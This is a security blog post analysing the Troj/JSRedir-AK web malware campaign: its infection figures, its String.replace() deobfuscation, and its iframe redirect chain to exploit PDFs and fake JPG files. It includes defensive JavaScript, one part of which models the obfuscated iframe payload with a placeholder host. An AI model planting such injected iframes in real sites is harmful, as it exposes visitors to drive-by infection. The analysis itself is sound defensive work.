Troj/JSRedir-AK: 40% of a month’s malware

It has been a month since we added detection for Troj/JSRedir-AK, and figures generated today show that this single piece of malicious code accounts for over 40% of all our web-based detections in that period.

[Graph shows malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]

We saw 180,000 webpages infected with Troj/JSRedir-AK in the last 31 days. Put in more human terms, that is one newly infected webpage roughly every 15 seconds (31 days is about 2.68 million seconds, and 2,678,400 / 180,000 is just under 15).

The affected sites include a host of well-known names, among them companies from the following industry sectors:

  • Energy Companies
  • Retail Companies
  • Automobile Club
  • Hotels

In two earlier posts I talked a little about what Troj/JSRedir-AK does, and I will expand on that below.

Using JavaScript's String.replace() method, the malware deobfuscates itself at run time and dynamically writes an iframe pointing to a Russian website on port 8080, which serves further scripts detected by Sophos as Troj/Iframe-DL.
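The following is an added illustration, not code from this post or from the malware itself. It models the first stage described above with a harmless, constructed payload (an iframe tag with junk characters inserted, undone by a single replace() call) and shows the analyst-side trick of running that stage against a fake document object that records what is written, so the redirect target can be recovered without a browser fetching anything. The host, port and path (example.invalid:8080/) and the page hostname are placeholders, not indicators from the campaign.

```javascript
// Added example, not the malware's code: a constructed stand-in for
// "deobfuscate with String.replace, then write an iframe", plus a small
// analyst routine that captures the written iframe offline.

// Constructed payload: the iframe markup with a junk '~' after every real
// character. A single replace() restores it. example.invalid is a placeholder.
const OBFUSCATED_PAYLOAD =
  '<~i~f~r~a~m~e~ ~s~r~c~=~"~h~t~t~p~:~/~/~e~x~a~m~p~l~e~.~i~n~v~a~l~i~d~' +
  ':~8~0~8~0~/~"~ ~w~i~d~t~h~=~"~1~"~ ~h~e~i~g~h~t~=~"~1~"~>~<~/~i~f~r~a~m~e~>';

// Stage one as an infected page would run it: strip the junk, then write the
// resulting iframe. `doc` is whatever supplies write(); in a browser that is
// the real `document`.
function stageOne(doc, payload) {
  const html = payload.replace(/~/g, '');
  doc.write(html);
  return html;
}

// Analyst side: feed stage one a fake document that records writes instead
// of rendering them, so no remote content is fetched or executed.
function captureWrites(payload) {
  const written = [];
  const fakeDocument = { write: (s) => written.push(s) };
  stageOne(fakeDocument, payload);
  return written;
}

// Pull the src of the first iframe out of captured HTML and split it into
// the parts worth recording: full URL, host and port. Null if there is no
// iframe with a parseable URL.
function extractIframeTarget(html) {
  const m = /<iframe\b[^>]*\ssrc\s*=\s*["']([^"']+)["']/i.exec(html);
  if (!m) return null;
  let url;
  try {
    url = new URL(m[1]);
  } catch {
    return null;
  }
  const defaultPort = url.protocol === 'https:' ? '443' : '80';
  return { href: url.href, hostname: url.hostname, port: url.port || defaultPort };
}

// Cheap triage rule, not a detection signature: an iframe that points
// off-site on a non-standard port has the shape of the redirect described
// in the post.
function isSuspiciousTarget(target, pageHostname) {
  if (!target) return false;
  const offSite = target.hostname !== pageHostname;
  const oddPort = !['80', '443'].includes(target.port);
  return offSite && oddPort;
}

function analyse(payload, pageHostname) {
  const target = extractIframeTarget(captureWrites(payload).join(''));
  return { target, suspicious: isSuspiciousTarget(target, pageHostname) };
}

console.log(JSON.stringify(analyse(OBFUSCATED_PAYLOAD, 'www.legit-site.invalid'), null, 2));
```

The fake-document approach generalises: any write-based dropper that only needs `document.write` (or a similar sink) can be run this way in Node to recover its second-stage URL, and the triage rule gives a quick first filter over the captured targets before any manual review.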

This second script in turn writes an iframe that attempts to load a malicious PDF (detected as Troj/PDFJs-FY) and a file masquerading as a JPG image that is in fact exploit code (detected as Exp/VidCtl-A). Whichever of these succeeds then installs further malware onto the victim's computer.
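A check worth having for the "file claiming to be a JPG image" part of this chain, added here as an example rather than taken from the post: a proxy, filter or analyst script that trusts the URL extension can be handed an exploit file under an image name, so compare the declared type with the file's leading bytes. The sample bodies below are constructed, not captured from the campaign.

```javascript
// Added example, not from the post: flag content whose declared type (from
// the URL extension) disagrees with the leading bytes of the body.

// Leading-byte signatures for the formats that matter in this chain.
const SIGNATURES = [
  { type: 'image/jpeg', magic: Buffer.from([0xff, 0xd8, 0xff]) },
  { type: 'application/pdf', magic: Buffer.from('%PDF-', 'ascii') },
  { type: 'image/gif', magic: Buffer.from('GIF8', 'ascii') },
  { type: 'image/png', magic: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]) },
];

// What a naive filter would assume from the extension alone.
const EXTENSION_TYPES = {
  jpg: 'image/jpeg', jpeg: 'image/jpeg', pdf: 'application/pdf', gif: 'image/gif', png: 'image/png',
};

function declaredType(urlPath) {
  const ext = urlPath.toLowerCase().split('?')[0].split('.').pop();
  return EXTENSION_TYPES[ext] || null;
}

// Identify the real type from the first bytes; null when nothing matches,
// which for something served as an image is itself a red flag.
function sniffType(bytes) {
  for (const { type, magic } of SIGNATURES) {
    if (bytes.length >= magic.length && bytes.subarray(0, magic.length).equals(magic)) return type;
  }
  return null;
}

// Verdicts: 'ok' (declared and actual agree), 'mismatch' (declared one known
// type, body is another), 'unknown' (declared a known type, body matches no
// known format, e.g. HTML or script under a .jpg name), 'undeclared'
// (extension tells us nothing, so the check does not apply).
function classify(urlPath, bytes) {
  const declared = declaredType(urlPath);
  const actual = sniffType(bytes);
  if (declared === null) return { declared, actual, verdict: 'undeclared' };
  if (actual === null) return { declared, actual, verdict: 'unknown' };
  return { declared, actual, verdict: declared === actual ? 'ok' : 'mismatch' };
}

// Constructed samples: a genuine JPEG header, a PDF served under a .jpg name,
// HTML/script served under a .jpg name, and a PDF served honestly.
const SAMPLES = [
  { path: '/images/photo.jpg', body: Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46]) },
  { path: '/images/banner.jpg', body: Buffer.from('%PDF-1.4\n%\xe2\xe3\xcf\xd3\n', 'latin1') },
  { path: '/images/pic.jpg', body: Buffer.from('<html><script>/* not an image */</script>', 'ascii') },
  { path: '/docs/form.pdf', body: Buffer.from('%PDF-1.6\n', 'ascii') },
];

function runSamples() {
  return SAMPLES.map((s) => ({ path: s.path, ...classify(s.path, s.body) }));
}

for (const r of runSamples()) {
  console.log(`${r.path}: declared=${r.declared} actual=${r.actual} -> ${r.verdict}`);
}
```

Treat 'mismatch' and 'unknown' as the interesting outcomes: the first is exactly the PDF-or-exploit-as-JPG pattern, and the second catches script or HTML hiding behind an image name. A real deployment would also compare against the Content-Type header, since attackers control that as well.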

Troj/JSRedir-AK is a continuation of the Gumblar gang's campaign, now using Russian domains in place of the Chinese ones seen previously.

In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R, and the infection mechanism appears to be the same: compromised FTP credentials used to modify pages on otherwise legitimate sites. That means simply removing the injected script is not enough; site owners also need to change the FTP credentials and check the machine they were used from, or the page will be reinfected.